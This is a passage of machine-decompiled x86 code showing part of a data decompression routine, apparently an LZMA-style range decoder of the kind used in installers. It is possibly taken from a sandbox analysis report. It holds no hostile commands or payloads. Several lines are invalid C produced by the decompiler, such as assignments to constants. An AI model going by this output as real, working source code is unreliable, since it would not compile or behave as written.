													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
